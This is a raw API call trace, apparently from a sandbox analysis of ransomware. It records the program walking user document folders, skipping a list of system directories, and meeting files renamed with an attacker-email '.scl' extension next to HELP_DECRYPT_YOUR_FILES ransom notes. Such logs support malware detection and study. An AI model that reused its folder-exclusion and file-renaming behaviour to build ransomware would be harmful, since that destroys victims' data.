	[0188.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="cache") returned 0x0
	[0188.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="temporary internet files") returned 0x0
	[0188.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.608] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="webcache") returned 0x0
	[0188.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.608] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="inetcache") returned 0x0
	[0188.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.608] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="nvidia") returned 0x0
	[0188.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.609] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="packages") returned 0x0
	[0188.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.609] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="cookies") returned 0x0
	[0188.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.609] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="programdata") returned 0x0
	[0188.609] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0188.610] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0188.610] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3cc7350, ftCreationTime.dwHighDateTime=0x1d97311, ftLastAccessTime.dwLowDateTime=0x89e8c681, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89efefa9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0188.610] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0188.610] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x894ca0f1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x894ca0f1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x894ca0f1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xac60, dwReserved0=0x0, dwReserved1=0x0, cFileName="0ahak j1pizvk7bc.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="0AHAKJ~1.SCL")) returned 1
	[0188.610] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8953c54a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8953c54a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89562866, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x12d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ho5dpxnqp.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="6HO5DP~1.SCL")) returned 1
	[0188.610] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8964746d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8964746d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8966d7dc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xcb00, dwReserved0=0x0, dwReserved1=0x0, cFileName="a4j36w_yzqhx9oiq.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="A4J36W~1.SCL")) returned 1
	[0188.610] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a2718a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89a2718a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89a4d365, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xba60, dwReserved0=0x0, dwReserved1=0x0, cFileName="eawc7822ba_1.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="EAWC78~1.SCL")) returned 1
	[0188.610] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a737f7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89a737f7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89a737f7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1610, dwReserved0=0x0, dwReserved1=0x0, cFileName="g7ne20mhtcw_rf5xx.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="G7NE20~1.SCL")) returned 1
	[0188.610] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89efefa9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89efefa9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89f24fc7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89eb28f7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89eb28f7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89efefa9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ae5eb0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89ae5eb0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89ae5eb0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd5e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kipouqk1rgay1fz.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="KIPOUQ~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89b323e1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89b323e1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89b323e1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nyj-jzklj.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="NYJ-JZ~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ba4a05, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89ba4a05, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89bcaa30, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7c10, dwReserved0=0x0, dwReserved1=0x0, cFileName="swx3yplraf4uemxfmvji.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="SWX3YP~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89bf0d9a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89bf0d9a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89bf0d9a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xe7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc5it4mey5fnqy5bf5s.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="VC5IT4~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c93a3b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89c93a3b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89cc2473, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x184d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x r4rdjlngcwe.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="XR4RDJ~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89d5b491, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89d5b491, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89d5b491, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x97e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x8zc5.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="X8ZC5X~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89dcda87, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89dcda87, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89dcda87, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9790, dwReserved0=0x0, dwReserved1=0x0, cFileName="ymafvurvguz8pq7s.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="YMAFVU~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89e66525, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89e66525, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89e8c681, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xefb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yxgmv9tma2.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="YXGMV9~1.SCL")) returned 1
	[0188.611] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xc73be0c0, ftLastAccessTime.dwHighDateTime=0x1d96cb9, ftLastWriteTime.dwLowDateTime=0xc73be0c0, ftLastWriteTime.dwHighDateTime=0x1d96cb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZRxhjZssJTmtcBLglvy", cAlternateFileName="ZRXHJZ~1")) returned 1
	[0188.621] lstrcmpW (lpString1="ZRxhjZssJTmtcBLglvy", lpString2="..") returned 1
	[0188.621] lstrcmpW (lpString1="ZRxhjZssJTmtcBLglvy", lpString2=".") returned 1
	[0188.621] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St"
	[0188.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="ZRxhjZssJTmtcBLglvy" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy"
	[0188.622] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy"
	[0188.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0188.622] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0188.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*"
	[0188.622] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xc73be0c0, ftLastAccessTime.dwHighDateTime=0x1d96cb9, ftLastWriteTime.dwLowDateTime=0xc73be0c0, ftLastWriteTime.dwHighDateTime=0x1d96cb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0188.623] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*") returned 75
	[0188.623] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.623] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\*.*", cchLength=0x4b | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*") returned 0x4b
	[0188.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.624] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="windows") returned 0x0
	[0188.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.624] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="boot") returned 0x0
	[0188.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.624] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="system volume information") returned 0x0
	[0188.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.625] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0188.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.625] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="temp") returned 0x0
	[0188.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.625] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="program files") returned 0x0
	[0188.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.626] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="program files (x86)") returned 0x0
	[0188.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.626] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="appdata") returned 0x0
	[0188.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.626] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="application data") returned 0x0
	[0188.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.626] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="winnt") returned 0x0
	[0188.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.627] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="tmp") returned 0x0
	[0188.627] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.627] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="cache") returned 0x0
	[0188.627] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.628] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="temporary internet files") returned 0x0
	[0188.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.628] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="webcache") returned 0x0
	[0188.634] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.634] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="inetcache") returned 0x0
	[0188.634] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.634] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="nvidia") returned 0x0
	[0188.634] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.634] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="packages") returned 0x0
	[0188.635] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.635] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="cookies") returned 0x0
	[0188.635] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.635] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\*.*", lpSrch="programdata") returned 0x0
	[0188.635] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xc73be0c0, ftLastAccessTime.dwHighDateTime=0x1d96cb9, ftLastWriteTime.dwLowDateTime=0xc73be0c0, ftLastWriteTime.dwHighDateTime=0x1d96cb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0188.636] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40af0bd0, ftCreationTime.dwHighDateTime=0x1d974d5, ftLastAccessTime.dwLowDateTime=0x9355deb0, ftLastAccessTime.dwHighDateTime=0x1d975e1, ftLastWriteTime.dwLowDateTime=0x9355deb0, ftLastWriteTime.dwHighDateTime=0x1d975e1, nFileSizeHigh=0x0, nFileSizeLow=0x7fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0fgWKow4jV4ZZL-25zz9.odt", cAlternateFileName="0FGWKO~1.ODT")) returned 1
	[0188.636] lstrcmpW (lpString1="0fgWKow4jV4ZZL-25zz9.odt", lpString2="..") returned 1
	[0188.636] lstrcmpW (lpString1="0fgWKow4jV4ZZL-25zz9.odt", lpString2=".") returned 1
	[0188.636] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0188.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="0fgWKow4jV4ZZL-25zz9.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\0fgWKow4jV4ZZL-25zz9.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\0fgWKow4jV4ZZL-25zz9.odt"
	[0188.636] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\0fgWKow4jV4ZZL-25zz9.odt") returned 96
	[0188.637] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.637] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\0fgWKow4jV4ZZL-25zz9.odt", cchLength=0x60 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt") returned 0x60
	[0188.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.637] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.637] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt"
	[0188.637] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt") returned 96
	[0188.637] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.638] StrStrW (lpFirst=".odt", lpSrch=".") returned=".odt"
	[0188.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
